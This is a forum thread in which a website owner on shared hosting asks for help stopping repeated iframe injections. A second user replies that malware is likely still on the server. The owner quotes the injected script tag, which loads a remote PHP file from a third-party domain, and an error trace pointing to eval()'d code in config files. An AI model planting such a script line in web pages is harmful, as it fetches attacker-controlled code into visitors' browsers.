Unix Server iFrame Injection, tried everything- please assist!

[Orun]

Hello,

I have an iframe injection problem that was likely originally caused by a Trojan on some windows machine (many people have FTP access to my server).
I am pretty tech savvy, but no sysadmin.
I know how to program (in C and others), and use unix (basic bash scripts)

My unix server hosts about 250 active websites and contains about 15GB of content. It's a shared server, so while I do have SSH access, I don't have root/superuser privileges (I can request package installs through my host's tech support though).

I cleared out my FTP usernames, changed passwords (FTP, SSH, Hosting), etc.
But I'm still getting injected with iframes all over the place.

Last month I was blacklisted, and I had to search for iframes, manually remove them all, and then use Google Webmaster tools to remove myself from "attack site" lists.

However I'm still getting injected left and right.
I tried using an iframe breaker javascript, but my attackers are just countering it with a more complex script of their owm :(

Would greatly appreciate any assistance.
Thanks.

[Orun]

Is there another category or place where I could get some assistance on this matter?
If so, can this thread be moved there?

UPDATE:
I'm employing a new strategy to fend off these damn script kiddies. Will be changing the global php.ini settings and moving all config.php's into other directories.

They're employing a new method now, using a basic script to redirect to a third party site that has a page which injects iframes.. not really sure how to stop that.. the script looks like this:

Code:

<script src=http://certification.kz/templates/globals.php-off.php ></script>

It seems that the site in question is just another site they have exploited..

I also discovered that they were using our php config files against us, when I started getting this error (upon trying to ftp access the site)

Code:

Fatal error: Cannot redeclare fdhhw() (previously declared in /home6/arkdemoc/public_html/carrental/index.php(1) : 
eval()'d code:1) in /home6/arkdemoc/public_html/carrental/include/config.inc.php(1) : eval()'d code on line 1

Hopefully hiding the config.php's will fix that, but I could really use some assistance.

I'll be forever grateful to anyone who takes their time to assist!

[Orun]

:( I've been looking around the security section and none of the questions are remotely difficult, most can be solved with a Google query. Am I in the wrong category?

[johnwill]

I'm not sure there's another forum more suited, it appears you have a problem with malware still on that server from the description.

You're right, most of the questions here can be solved by a simple search, but many folks have no idea what to search for. You might say we're the "friendly" interface to the search engine.